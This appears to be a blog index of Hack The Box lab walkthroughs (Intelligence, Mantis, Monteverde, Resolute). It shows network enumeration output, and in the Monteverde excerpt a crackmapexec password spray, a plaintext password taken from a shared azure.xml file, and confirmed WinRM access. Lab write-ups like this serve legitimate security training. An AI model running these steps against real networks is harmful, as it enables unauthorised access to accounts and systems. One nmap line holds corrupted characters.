| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
9389/tcp open  mc-nmf        .NET Message Framing
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-09-06T23:11:17
|_  start_date: N/A
|_clock-skew: mean: 6h59m23s, deviation: 0s, median: 6h59m23s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 91.24 seconds

└─$ sudo nmap -sU --top-ports 10 -sV -sC 10.10.10.248
[sudo] password for kali: 
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-06 17:23 BST
Nmap scan report for 10.10.10.248 (10.10.10.248)
Host is up (0.10s latency).

PORT     STATE         SERVICE      VERSION
53/udp   open          domain       Simple DNS Plus
67/udp   open|filtered dhcps
123/udp  open          ntp          NTP v3
| ntp-info: 
|_  
135/udp  open|filtered msrpc
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
161/udp  open|filtered snmp
445/udp  open|filtered microsoft-ds
631/udp  open|filtered ipp
1434/udp open|filtered ms-sql-m
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 6h59m24s
  • smb
└─$ smbclient -N -L //10.10.10.248                         
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.248 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • dns
└─$ dig  @dc.intelligence.htb intelligence.htb 

; <<>> DiG 9.18.16-1-Debian <<>> @dc.intelligence.htb intelligence.htb
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 1581
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 0, ADDITIONAL: 1

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 4000
;; QUESTION SECTION:
;intelligence.htb.              IN      A

;; ANSWER SECTION:
intelligence.htb.       600     IN      A       10.10.10.248

;; Query time: 95 msec
;; SERVER: 10.10.10.248#53(dc.intelligence.htb) (UDP)
;; WHEN: Wed Sep 06 17:29:23 BST 2023
;; MSG SIZE  rcvd: 61

└─$ dig axfr @dc.intelligence.htb intelligence.htb

; <<>> DiG 9.18.16-1-Debian <<>> axfr @dc.intelligence.htb intelligence.htb
; (1 server found)
;; global options: +cmd
; Transfer failed.

└─$ dnsenum --dnsserver 10.10.10.248 -f /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt intelligence.htb      
dnsenum VERSION:1.2.6

-----   intelligence.htb   -----                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
Host's addresses:                                                                                                                                                                                                                           
__________________                                                                                                                                                                                                                          
                                                                                                                                                                                                                                            
intelligence.htb.                        600      IN    A        10.10.10.248                                                                                                                                                               

                                                                                                                                                                                                                                            
Name Servers:                                                                                                                                                                                                                               
______________                                                                                                                                                                                                                              
                                                                                                                                                                                                                                            
dc.intelligence.htb.                     3600     IN    A        10.10.10.248                                                                                                                                                               

                                                                                                                                                                                                                                            
Mail (MX) Servers:                                                                                                                                                                                                                          
___________________                                                                                                                                                                                                                         
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
                                                                                                                                                                                                                                            
Trying Zone Transfers and getting Bind Versions:                                                                                                                                                                                            
_________________________________________________                                                                                                                                                                                           
                                                                                                                                                                                                                                            
unresolvable name: dc.intelligence.htb at /usr/bin/dnsenum line 900.                                                                                                                                                                        
                                                                                                                                                                                                                                            
Trying Zone Transfer for intelligence.htb on dc.intelligence.htb ... 
AXFR record query failed: no nameservers

                                                                                                                                                                                                                                            
Brute forcing with /usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt:                                                                                                                                                     
________________________________________________________________________________________                                                                                                                                                    
                                                                                                                                                                                                                                            
dc.intelligence.htb.                     3600     IN    A        10.10.10.248
domaindnszones.intelligence.htb.         600      IN    A        10.10.10.248
forestdnszones.intelligence.htb.         600      IN    A        10.10.10.248


intelligence.htb class C netranges:
____________________________________



Performing reverse lookup on 0 ip addresses:
_____________________________________________


0 results out of 0 IP addresses.


intelligence.htb ip blocks:
____________________________


done.
  • ldap
└─$ ldapsearch -H ldap://10.10.10.248 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=intelligence,DC=htb
namingcontexts: CN=Configuration,DC=intelligence,DC=htb
namingcontexts: CN=Schema,CN=Configuration,DC=intelligence,DC=htb
namingcontexts: DC=DomainDnsZones,DC=intelligence,DC=htb
namingcontexts: DC=ForestDnsZones,DC=intelligence,DC=htb

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

└─$ ldapsearch -H ldap://10.10.10.248 -x -b "DC=intelligence,DC=htb"
# extended LDIF
#
# LDAPv3
# base <DC=intelligence,DC=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# search result
search: 2
result: 1 Operations error
text: 000004DC: LdapErr: DSID-0C090A5C, comment: In order to perform this opera
 tion a successful bind must be completed on the connection., data 0, v4563

# numResponses: 1
  • Web Server
    • contact@intelligence.htb
    • http://intelligence.htb/documents/2020-01-01-upload.pdf
    • http://intelligence.htb/documents/2020-12-15-upload.pdf

Wednesday, September 6, 2023 | 17 minutes Read
Hero Image
[HTB] Machine: Mantis

Mantis

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.52 -T4                            
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 09:57 BST
Nmap scan report for 10.10.10.52 (10.10.10.52)
Host is up (0.12s latency).
Not shown: 65508 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
1337/tcp  open  waste
1433/tcp  open  ms-sql-s
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5722/tcp  open  msdfsr
8080/tcp  open  http-proxy
9389/tcp  open  adws
47001/tcp open  winrm
49152/tcp open  unknown
49153/tcp open  unknown
49154/tcp open  unknown
49155/tcp open  unknown
49157/tcp open  unknown
49158/tcp open  unknown
49161/tcp open  unknown
49165/tcp open  unknown
49171/tcp open  unknown
50255/tcp open  unknown

└─$ nmap -Pn -p53,88,135,139,389,445,464,593,636,1337,1433,3268,3269,5722,8080,9389,10475,26347,49152,49153,49154,49155,49157,49158,49164,49165,49171,50255 -sC -sV 10.10.10.52 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-03 10:22 BST
Nmap scan report for 10.10.10.52 (10.10.10.52)
Host is up (0.15s latency).

PORT      STATE  SERVICE      VERSION
53/tcp    open   domain       Microsoft DNS 6.1.7601 (1DB15CD4) (Windows Server 2008 R2 SP1)
| dns-nsid: 
|_  bind.version: Microsoft DNS 6.1.7601 (1DB15CD4)
88/tcp    open   kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-03 09:22:30Z)
135/tcp   open   msrpc        Microsoft Windows RPC
139/tcp   open   netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp   open                Windows Server 2008 R2 Standard 7601 Service Pack 1 microsoft-ds (workgroup: HTB)
464/tcp   open   kpasswd5?
593/tcp   open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open   tcpwrapped
1337/tcp  open   http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
| http-methods: 
|_  Potentially risky methods: TRACE
1433/tcp  open   ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info: 
|   10.10.10.52:1433: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ms-sql-ntlm-info: 
|   10.10.10.52:1433: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
|_ssl-date: 2023-09-03T09:23:37+00:00; -36s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-03T08:54:18
|_Not valid after:  2053-09-03T08:54:18
3268/tcp  open   ldap         Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp  open   tcpwrapped
5722/tcp  open   msrpc        Microsoft Windows RPC
8080/tcp  open   http         Microsoft IIS httpd 7.5
|_http-server-header: Microsoft-IIS/7.5
|_http-title: Tossed Salad - Blog
9389/tcp  open   mc-nmf       .NET Message Framing
10475/tcp closed unknown
26347/tcp closed unknown
49152/tcp open   msrpc        Microsoft Windows RPC
49153/tcp open   msrpc        Microsoft Windows RPC
49154/tcp open   msrpc        Microsoft Windows RPC
49155/tcp open   msrpc        Microsoft Windows RPC
49157/tcp open   ncacn_http   Microsoft Windows RPC over HTTP 1.0
49158/tcp open   msrpc        Microsoft Windows RPC
49164/tcp closed unknown
49165/tcp open   msrpc        Microsoft Windows RPC
49171/tcp open   msrpc        Microsoft Windows RPC
50255/tcp open   ms-sql-s     Microsoft SQL Server 2014 12.00.2000.00; RTM
| ms-sql-info: 
|   10.10.10.52:50255: 
|     Version: 
|       name: Microsoft SQL Server 2014 RTM
|       number: 12.00.2000.00
|       Product: Microsoft SQL Server 2014
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 50255
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-09-03T08:54:18
|_Not valid after:  2053-09-03T08:54:18
| ms-sql-ntlm-info: 
|   10.10.10.52:50255: 
|     Target_Name: HTB
|     NetBIOS_Domain_Name: HTB
|     NetBIOS_Computer_Name: MANTIS
|     DNS_Domain_Name: htb.local
|     DNS_Computer_Name: mantis.htb.local
|     DNS_Tree_Name: htb.local
|_    Product_Version: 6.1.7601
|_ssl-date: 2023-09-03T09:23:37+00:00; -37s from scanner time.
Service Info: Host: MANTIS; OS: Windows; CPE: cpe:/o:microsoft:windows_server_2008:r2:sp1, cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   2:1:0: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2023-09-03T09:23:28
|_  start_date: 2023-09-03T08:54:08
| smb-security-mode: 
|   account_used: <blank>
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb-os-discovery: 
|   OS: Windows Server 2008 R2 Standard 7601 Service Pack 1 (Windows Server 2008 R2 Standard 6.1)
|   OS CPE: cpe:/o:microsoft:windows_server_2008::sp1
|   Computer name: mantis
|   NetBIOS computer name: MANTIS\x00
|   Domain name: htb.local
|   Forest name: htb.local
|   FQDN: mantis.htb.local
|_  System time: 2023-09-03T05:23:27-04:00
|_clock-skew: mean: 33m41s, deviation: 1h30m43s, median: -36s
  • smb
└─$ smbclient -N -L //10.10.10.52 
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.52 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • rpc
└─$ rpcclient -U '' -N 10.10.10.52
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> querydispinfo
result was NT_STATUS_ACCESS_DENIED
rpcclient $>

Friday, September 1, 2023 | 6 minutes Read
Hero Image
[HTB] Machine: Monteverde

Monteverde

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.172 -T4          
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-02 17:02 BST
Nmap scan report for 10.10.10.172 (10.10.10.172)
Host is up (0.095s latency).
Not shown: 65518 filtered tcp ports (no-response)
PORT      STATE SERVICE
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
49667/tcp open  unknown
49673/tcp open  unknown
49674/tcp open  unknown
49676/tcp open  unknown
49697/tcp open  unknown
54886/tcp open  unknown

└─$ nmap -Pn -p88,135,139,389,464,593,636,3268,3269,5985,9389 -sC -sV 10.10.10.172 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-02 17:38 BST
Nmap scan report for 10.10.10.172 (10.10.10.172)
Host is up (0.16s latency).

PORT     STATE SERVICE      VERSION
88/tcp   open  kerberos-sec Microsoft Windows Kerberos (server time: 2023-09-02 16:37:49Z)
135/tcp  open  msrpc        Microsoft Windows RPC
139/tcp  open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap         Microsoft Windows Active Directory LDAP (Domain: MEGABANK.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf       .NET Message Framing
Service Info: Host: MONTEVERDE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_smb2-security-mode: SMB: Couldn't find a NetBIOS name that works for the server. Sorry!
|_smb2-time: ERROR: Script execution failed (use -d to debug)
  • smb
  • ldap
└─$ ldapsearch -H ldap://10.10.10.172 -x -s base namingcontexts
# extended LDIF
#
# LDAPv3
# base <> (default) with scope baseObject
# filter: (objectclass=*)
# requesting: namingcontexts 
#

#
dn:
namingcontexts: DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
namingcontexts: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL

# search result
search: 2
result: 0 Success

# numResponses: 2
# numEntries: 1

Foothold

  • Will dump everything ldapsearch -H ldap://10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL"
└─$ ldapsearch -H ldap://10.10.10.172 -x -b "DC=MEGABANK,DC=LOCAL" 
# extended LDIF
#
# LDAPv3
# base <DC=MEGABANK,DC=LOCAL> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# MEGABANK.LOCAL
dn: DC=MEGABANK,DC=LOCAL
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=MEGABANK,DC=LOCAL
instanceType: 5
whenCreated: 20200102220515.0Z
whenChanged: 20230902160106.0Z
subRefs: DC=ForestDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: DC=DomainDnsZones,DC=MEGABANK,DC=LOCAL
subRefs: CN=Configuration,DC=MEGABANK,DC=LOCAL
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAD3ugOsMvMU+GSt3sotNcxQ==
uSNChanged: 77851
name: MEGABANK
objectGUID:: dF0ZQW9mmEa6eGdQmEH00A==
replUpToDateVector:: AgAAAAAAAAALAAAAAAAAAA97oDrDLzFPhkrd7KLTXMUFcAAAAAAAAHgMH
 xQDAAAAR5FJQrVN102DFng19yhewBEwAQAAAAAAQO0DGwMAAAAwI/VDJY7GTL9LbBrQc6myECABAA
 AAAABJ0GoZAwAAADOghEir6oNEsvEJ9u8wjngKwAAAAAAAALHzHxQDAAAATEU0VTJDIUOpC+muz1W
 GHAzgAAAAAAAAFc0jFAMAAABlUzJYUqlcQa1wRtRT7+pYCbAAAAAAAAAH5x8UAwAAAF7963Yf1ZpM
 jnEppodbjcsOAAEAAAAAAE3OshYDAAAAhz8WkG49/0eslA/vS3oKjgeQAAAAAAAA5BYfFAMAAAAPn
 /fkzuNaRKsJOojPyQTJBoAAAAAAAAA5Ex8UAwAAAKdfSfADqmJLvDeHFzYjcqcL0AAAAAAAALqZIx
 QDAAAASULD+GgHQU+OAWPs7IQ4IQ8QAQAAAAAAYz1oGQMAAAA=
creationTime: 133381440661787842
forceLogoff: -9223372036854775808
lockoutDuration: -18000000000
lockOutObservationWindow: -18000000000
lockoutThreshold: 0
maxPwdAge: -36288000000000
minPwdAge: -864000000000
minPwdLength: 7
modifiedCountAtLastProm: 0
...

└─$ rpcclient -U "" -N 10.10.10.172  

rpcclient $> enumdomusers
user:[Guest] rid:[0x1f5]
user:[AAD_987d7f2f57d2] rid:[0x450]
user:[mhope] rid:[0x641]
user:[SABatchJobs] rid:[0xa2a]
user:[svc-ata] rid:[0xa2b]
user:[svc-bexec] rid:[0xa2c]
user:[svc-netapp] rid:[0xa2d]
user:[dgalanos] rid:[0xa35]
user:[roleary] rid:[0xa36]
user:[smorgan] rid:[0xa37]

rpcclient $> querydispinfo
index: 0xfb6 RID: 0x450 acb: 0x00000210 Account: AAD_987d7f2f57d2       Name: AAD_987d7f2f57d2  Desc: Service account for the Synchronization Service with installation identifier 05c97990-7587-4a3d-b312-309adfc172d9 running on computer MONTEVERDE.
index: 0xfd0 RID: 0xa35 acb: 0x00000210 Account: dgalanos       Name: Dimitris Galanos  Desc: (null)
index: 0xedb RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain
index: 0xfc3 RID: 0x641 acb: 0x00000210 Account: mhope  Name: Mike Hope Desc: (null)
index: 0xfd1 RID: 0xa36 acb: 0x00000210 Account: roleary        Name: Ray O'Leary       Desc: (null)
index: 0xfc5 RID: 0xa2a acb: 0x00000210 Account: SABatchJobs    Name: SABatchJobs       Desc: (null)
index: 0xfd2 RID: 0xa37 acb: 0x00000210 Account: smorgan        Name: Sally Morgan      Desc: (null)
index: 0xfc6 RID: 0xa2b acb: 0x00000210 Account: svc-ata        Name: svc-ata   Desc: (null)
index: 0xfc7 RID: 0xa2c acb: 0x00000210 Account: svc-bexec      Name: svc-bexec Desc: (null)
index: 0xfc8 RID: 0xa2d acb: 0x00000210 Account: svc-netapp     Name: svc-netapp        Desc: (null)
  • No more information we could retrieve
    • So we might try password spraying using crackmapexec
    • First, we will try using usernames as passwords
      • Then we might need to create different password list using names combinations
└─$ crackmapexec smb 10.10.10.172 -u users.list -p users.list 
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:mhope STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:SABatchJobs STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-ata STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-bexec STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:svc-netapp STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:dgalanos STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:roleary STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\mhope:smorgan STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [-] MEGABANK.LOCAL\SABatchJobs:mhope STATUS_LOGON_FAILURE 
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\SABatchJobs:SABatchJobs
  • Now let’s enumerate smb
└─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs
[+] IP: 10.10.10.172:445        Name: 10.10.10.172                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        azure_uploads                                           READ ONLY
        C$                                                      NO ACCESS       Default share
        E$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 
        users$                                                  READ ONLY

└─$ smbmap -H 10.10.10.172 -u SABatchJobs -p SABatchJobs -R users$
[+] IP: 10.10.10.172:445        Name: 10.10.10.172                                      
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        users$                                                  READ ONLY
        .\users$\*
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    .
        dr--r--r--                0 Fri Jan  3 13:12:48 2020    ..
        dr--r--r--                0 Fri Jan  3 13:15:23 2020    dgalanos
        dr--r--r--                0 Fri Jan  3 13:41:18 2020    mhope
        dr--r--r--                0 Fri Jan  3 13:14:56 2020    roleary
        dr--r--r--                0 Fri Jan  3 13:14:28 2020    smorgan
        .\users$\mhope\*
        dr--r--r--                0 Fri Jan  3 13:41:18 2020    .
        dr--r--r--                0 Fri Jan  3 13:41:18 2020    ..
        fw--w--w--             1212 Fri Jan  3 14:59:24 2020    azure.xml
  • Let’s get azure.xml from mhope’s directory
└─$ smbclient -U SABatchJobs //10.10.10.172/users$ --password 'SABatchJobs'
  • azure.xml
    • Looks like we have a password
└─$ cat azure.xml                                            
��<Objs Version="1.1.0.1" xmlns="http://schemas.microsoft.com/powershell/2004/04">
  <Obj RefId="0">
    <TN RefId="0">
      <T>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</T>
      <T>System.Object</T>
    </TN>
    <ToString>Microsoft.Azure.Commands.ActiveDirectory.PSADPasswordCredential</ToString>
    <Props>
      <DT N="StartDate">2020-01-03T05:35:00.7562298-08:00</DT>
      <DT N="EndDate">2054-01-03T05:35:00.7562298-08:00</DT>
      <G N="KeyId">00000000-0000-0000-0000-000000000000</G>
      <S N="Password">4n0therD4y@n0th3r$</S>
    </Props>
  </Obj>
</Objs>
  • Let’s check it via crackmapexec
└─$ crackmapexec smb 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
SMB         10.10.10.172    445    MONTEVERDE       [*] Windows 10.0 Build 17763 x64 (name:MONTEVERDE) (domain:MEGABANK.LOCAL) (signing:True) (SMBv1:False)
SMB         10.10.10.172    445    MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ 

└─$ crackmapexec winrm 10.10.10.172 -u mhope -p '4n0therD4y@n0th3r$'
SMB         10.10.10.172    5985   MONTEVERDE       [*] Windows 10.0 Build 17763 (name:MONTEVERDE) (domain:MEGABANK.LOCAL)
HTTP        10.10.10.172    5985   MONTEVERDE       [*] http://10.10.10.172:5985/wsman
WINRM       10.10.10.172    5985   MONTEVERDE       [+] MEGABANK.LOCAL\mhope:4n0therD4y@n0th3r$ (Pwn3d!)
  • We can evil-winrm

Friday, September 1, 2023 | 7 minutes Read
Hero Image
[HTB] Machine: Resolute

Resolute

Enumeration

  • nmap
└─$ nmap -Pn -p- 10.10.10.169 -T4           
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 16:49 BST
Stats: 0:02:44 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 30.27% done; ETC: 16:58 (0:06:20 remaining)
Nmap scan report for 10.10.10.169 (10.10.10.169)
Host is up (0.16s latency).
Not shown: 65511 closed tcp ports (conn-refused)
PORT      STATE SERVICE
53/tcp    open  domain
88/tcp    open  kerberos-sec
135/tcp   open  msrpc
139/tcp   open  netbios-ssn
389/tcp   open  ldap
445/tcp   open  microsoft-ds
464/tcp   open  kpasswd5
593/tcp   open  http-rpc-epmap
636/tcp   open  ldapssl
3268/tcp  open  globalcatLDAP
3269/tcp  open  globalcatLDAPssl
5985/tcp  open  wsman
9389/tcp  open  adws
47001/tcp open  winrm
49664/tcp open  unknown
49665/tcp open  unknown
49666/tcp open  unknown
49667/tcp open  unknown
49671/tcp open  unknown
49678/tcp open  unknown
49679/tcp open  unknown
49684/tcp open  unknown
49717/tcp open  unknown
50287/tcp open  unknown

└─$ nmap -Pn -p53,88,135,139,389,445,464,593,636,3268,3269,5985,9389 -sC -sV 10.10.10.169 -T4
Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-04 18:02 BST
Nmap scan report for 10.10.10.169 (10.10.10.169)
Host is up (0.17s latency).

PORT     STATE SERVICE        VERSION
53/tcp   open  domain         Simple DNS Plus
88/tcp   open  kerberos-sec   Microsoft Windows Kerberos (server time: 2023-09-04 17:08:39Z)
135/tcp  open  msrpc          Microsoft Windows RPC
139/tcp  open  netbios-ssn    Microsoft Windows netbios-ssn
389/tcp  open  ldap           Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
445/tcp  open  microsof��λ�U Windows Server 2016 Standard 14393 microsoft-ds (workgroup: MEGABANK)
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http     Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap           Microsoft Windows Active Directory LDAP (Domain: megabank.local, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
5985/tcp open  http           Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open  mc-nmf         .NET Message Framing
Service Info: Host: RESOLUTE; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb-os-discovery: 
|   OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
|   Computer name: Resolute
|   NetBIOS computer name: RESOLUTE\x00
|   Domain name: megabank.local
|   Forest name: megabank.local
|   FQDN: Resolute.megabank.local
|_  System time: 2023-09-04T10:08:48-07:00
| smb-security-mode: 
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: required
| smb2-time: 
|   date: 2023-09-04T17:08:49
|_  start_date: 2023-09-04T15:51:23
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: 2h26m23s, deviation: 4h02m30s, median: 6m22s
  • smb
└─$ smbclient -N -L //10.10.10.169                                              
Anonymous login successful

        Sharename       Type      Comment
        ---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.169 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
  • rpc
└─$ rpcclient -U "" -N 10.10.10.169
rpcclient $> querydominfo
Domain:         MEGABANK
Server:
Comment:
Total Users:    79
Total Groups:   0
Total Aliases:  0
Sequence No:    1
Force Logoff:   -1
Domain Server State:    0x1
Server Role:    ROLE_DOMAIN_PDC
Unknown 3:      0x1

rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[ryan] rid:[0x451]
user:[marko] rid:[0x457]
user:[sunita] rid:[0x19c9]
user:[abigail] rid:[0x19ca]
user:[marcus] rid:[0x19cb]
user:[sally] rid:[0x19cc]
user:[fred] rid:[0x19cd]
user:[angela] rid:[0x19ce]
user:[felicia] rid:[0x19cf]
user:[gustavo] rid:[0x19d0]
user:[ulf] rid:[0x19d1]
user:[stevie] rid:[0x19d2]
user:[claire] rid:[0x19d3]
user:[paulo] rid:[0x19d4]
user:[steve] rid:[0x19d5]
user:[annette] rid:[0x19d6]
user:[annika] rid:[0x19d7]
user:[per] rid:[0x19d8]
user:[claude] rid:[0x19d9]
user:[melanie] rid:[0x2775]
user:[zach] rid:[0x2776]
user:[simon] rid:[0x2777]
user:[naoki] rid:[0x2778]

rpcclient $> querydispinfo
index: 0x10b0 RID: 0x19ca acb: 0x00000010 Account: abigail      Name: (null)    Desc: (null)
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain
index: 0x10b4 RID: 0x19ce acb: 0x00000010 Account: angela       Name: (null)    Desc: (null)
index: 0x10bc RID: 0x19d6 acb: 0x00000010 Account: annette      Name: (null)    Desc: (null)
index: 0x10bd RID: 0x19d7 acb: 0x00000010 Account: annika       Name: (null)    Desc: (null)
index: 0x10b9 RID: 0x19d3 acb: 0x00000010 Account: claire       Name: (null)    Desc: (null)
index: 0x10bf RID: 0x19d9 acb: 0x00000010 Account: claude       Name: (null)    Desc: (null)
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.
index: 0x10b5 RID: 0x19cf acb: 0x00000010 Account: felicia      Name: (null)    Desc: (null)
